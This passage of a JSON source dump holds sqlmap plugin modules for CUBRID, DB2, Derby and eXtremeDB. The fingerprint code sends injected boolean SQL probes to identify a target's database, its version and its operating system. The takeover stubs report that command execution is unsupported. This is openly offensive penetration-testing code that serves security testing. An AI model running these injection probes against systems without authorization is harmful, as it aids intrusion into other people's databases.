    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import CUBRID_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.CUBRID)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.CUBRID\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(CUBRID_ALIASES):\n            setDbms(DBMS.CUBRID)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.CUBRID\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"{} SUBSETEQ (CAST ({} AS SET))\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.CUBRID\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"DRAND()<2\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.CUBRID\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.CUBRID)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.CUBRID\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cubrid/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> from lib.core.common import Backend\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cubrid/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Cubrid it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Cubrid it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Cubrid it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Cubrid it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/db2/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import DB2_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.db2.enumeration import Enumeration\nfrom plugins.dbms.db2.filesystem import Filesystem\nfrom plugins.dbms.db2.fingerprint import Fingerprint\nfrom plugins.dbms.db2.syntax import Syntax\nfrom plugins.dbms.db2.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines DB2 methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = DB2_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.DB2] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/db2/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import ibm_db_dbi\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/ibmdb/python-ibmdb\n    User guide: https://github.com/ibmdb/python-ibmdb/wiki/README\n    API: https://www.python.org/dev/peps/pep-0249/\n    License: Apache License 2.0\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            database = \"DRIVER={IBM DB2 ODBC DRIVER};DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;\" % (self.db, self.hostname, self.port)\n            self.connector = ibm_db_dbi.connect(database, self.user, self.password)\n        except ibm_db_dbi.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except ibm_db_dbi.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n        except ibm_db_dbi.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/db2/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getPasswordHashes(self):\n        warnMsg = \"on IBM DB2 it is not possible to enumerate password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getStatements(self):\n        warnMsg = \"on IBM DB2 it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/db2/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/db2/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import OS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import DB2_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.DB2)\n\n    def _versionCheck(self):\n        minor, major = None, None\n\n        for version in reversed(xrange(5, 15)):\n            result = inject.checkBooleanExpression(\"(SELECT COUNT(*) FROM sysibm.sysversions WHERE versionnumber BETWEEN %d000000 AND %d999999)>0\" % (version, version))\n\n            if result:\n                major = version\n\n                for version in reversed(xrange(0, 20)):\n                    result = inject.checkBooleanExpression(\"(SELECT COUNT(*) FROM sysibm.sysversions WHERE versionnumber BETWEEN %d%02d0000 AND %d%02d9999)>0\" % (major, version, major, version))\n                    if result:\n                        minor = version\n                        version = \"%s.%s\" % (major, minor)\n                        break\n\n                break\n\n        if major and minor:\n            return \"%s.%s\" % (major, minor)\n        else:\n            return None\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.DB2\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(DB2_ALIASES):\n            setDbms(DBMS.DB2)\n\n            return True\n\n        logMsg = \"testing %s\" % DBMS.DB2\n        logger.info(logMsg)\n\n        result = inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1)\")\n\n        if result:\n            logMsg = \"confirming %s\" % DBMS.DB2\n            logger.info(logMsg)\n\n            result = inject.checkBooleanExpression(\"JULIAN_DAY(CURRENT DATE) IS NOT NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.DB2\n                logger.warning(warnMsg)\n\n                return False\n\n            version = self._versionCheck()\n            if version:\n                Backend.setVersion(version)\n                setDbms(\"%s %s\" % (DBMS.DB2, Backend.getVersion()))\n            else:\n                setDbms(DBMS.DB2)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.DB2\n            logger.warning(warnMsg)\n\n            return False\n\n    def checkDbmsOs(self, detailed=False):\n        if Backend.getOs():\n            return\n\n        infoMsg = \"fingerprinting the back-end DBMS operating system \"\n        infoMsg += \"version and service pack\"\n        logger.info(infoMsg)\n\n        query = \"(SELECT LENGTH(OS_NAME) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_NAME LIKE '%WIN%')>0\"\n        result = inject.checkBooleanExpression(query)\n\n        if not result:\n            Backend.setOs(OS.LINUX)\n        else:\n            Backend.setOs(OS.WINDOWS)\n\n        infoMsg = \"the back-end DBMS operating system is %s\" % Backend.getOs()\n\n        if result:\n            versions = {\n                \"2003\": (\"5.2\", (2, 1)),\n                \"2008\": (\"7.0\", (1,)),\n                \"2000\": (\"5.0\", (4, 3, 2, 1)),\n                \"7\": (\"6.1\", (1, 0)),\n                \"XP\": (\"5.1\", (2, 1)),\n                \"NT\": (\"4.0\", (6, 5, 4, 3, 2, 1))\n            }\n\n            # Get back-end DBMS underlying operating system version\n            for version, data in versions.items():\n                query = \"(SELECT LENGTH(OS_VERSION) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_VERSION = '%s')>0\" % data[0]\n                result = inject.checkBooleanExpression(query)\n\n                if result:\n                    Backend.setOsVersion(version)\n                    infoMsg += \" %s\" % Backend.getOsVersion()\n                    break\n\n            if not Backend.getOsVersion():\n                return\n\n            # Get back-end DBMS underlying operating system service pack\n            for sp in versions[Backend.getOsVersion()][1]:\n                query = \"(SELECT LENGTH(OS_RELEASE) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_RELEASE LIKE '%Service Pack \" + str(sp) + \"%')>0\"\n                result = inject.checkBooleanExpression(query)\n\n                if result:\n                    Backend.setOsServicePack(sp)\n                    break\n\n            if not Backend.getOsServicePack():\n                Backend.setOsServicePack(0)\n                debugMsg = \"assuming the operating system has no service pack\"\n                logger.debug(debugMsg)\n\n            if Backend.getOsVersion():\n                infoMsg += \" Service Pack %d\" % Backend.getOsServicePack()\n\n            logger.info(infoMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/db2/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/db2/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def __init__(self):\n        self.__basedir = None\n        self.__datadir = None\n\n        GenericTakeover.__init__(self)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/derby/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import DERBY_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.derby.enumeration import Enumeration\nfrom plugins.dbms.derby.filesystem import Filesystem\nfrom plugins.dbms.derby.fingerprint import Fingerprint\nfrom plugins.dbms.derby.syntax import Syntax\nfrom plugins.dbms.derby.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass DerbyMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Apache Derby methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = DERBY_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.DERBY] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/derby/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import drda\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/nakagami/pydrda/\n    User guide: https://github.com/nakagami/pydrda/blob/master/README.rst\n    API: https://www.python.org/dev/peps/pep-0249/\n    License: MIT\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = drda.connect(host=self.hostname, database=self.db, port=self.port)\n        except drda.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except drda.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except (drda.OperationalError, drda.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except drda.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        try:\n            self.connector.commit()\n        except drda.OperationalError:\n            pass\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/derby/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getPasswordHashes(self):\n        warnMsg = \"on Apache Derby it is not possible to enumerate password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getStatements(self):\n        warnMsg = \"on Apache Derby it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Apache Derby it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on Apache Derby it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on Apache Derby it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getBanner(self):\n        warnMsg = \"on Apache Derby it is not possible to enumerate the banner\"\n        singleTimeWarnMessage(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/derby/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/derby/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import DERBY_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.DERBY)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.DERBY\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(DERBY_ALIASES):\n            setDbms(DBMS.DERBY)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.DERBY\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 {LIMIT 1 OFFSET 0})\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.DERBY\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"(SELECT CURRENT SCHEMA FROM SYSIBM.SYSDUMMY1) IS NOT NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.DERBY\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.DERBY)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.DERBY\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/derby/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 'abcdefgh' FROM foobar\"\n        True\n        \"\"\"\n\n        return expression\n"
  },
  {
    "path": "sqlmap/plugins/dbms/derby/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Apache Derby it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Apache Derby it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Apache Derby it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Apache Derby it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/extremedb/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import EXTREMEDB_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.extremedb.enumeration import Enumeration\nfrom plugins.dbms.extremedb.filesystem import Filesystem\nfrom plugins.dbms.extremedb.fingerprint import Fingerprint\nfrom plugins.dbms.extremedb.syntax import Syntax\nfrom plugins.dbms.extremedb.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass ExtremeDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines eXtremeDB methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = EXTREMEDB_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.EXTREMEDB] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/extremedb/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on eXtremeDB it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/extremedb/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        warnMsg = \"on eXtremeDB it is not possible to get the banner\"\n        logger.warning(warnMsg)\n\n        return None\n\n    def getCurrentUser(self):\n        warnMsg = \"on eXtremeDB it is not possible to enumerate the current user\"\n        logger.warning(warnMsg)\n\n    def getCurrentDb(self):\n        warnMsg = \"on eXtremeDB it is not possible to get name of the current database\"\n        logger.warning(warnMsg)\n\n    def isDba(self, user=None):\n        warnMsg = \"on eXtremeDB it is not possible to test if current user is DBA\"\n        logger.warning(warnMsg)\n\n    def getUsers(self):\n        warnMsg = \"on eXtremeDB it is not possible to enumerate the users\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on eXtremeDB it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on eXtremeDB it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getDbs(self):\n        warnMsg = \"on eXtremeDB it is not possible to enumerate databases (use only '--tables')\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchDb(self):\n        warnMsg = \"on eXtremeDB it is not possible to search databases\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchTable(self):\n        warnMsg = \"on eXtremeDB it is not possible to search tables\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        warnMsg = \"on eXtremeDB it is not possible to search columns\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def search(self):\n        warnMsg = \"on eXtremeDB search option is not available\"\n        logger.warning(warnMsg)\n\n    def getHostname(self):\n        warnMsg = \"on eXtremeDB it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on eXtremeDB it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/extremedb/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on eXtremeDB it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on eXtremeDB it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/extremedb/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import EXTREMEDB_ALIASES\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.EXTREMEDB)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.EXTREMEDB\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active 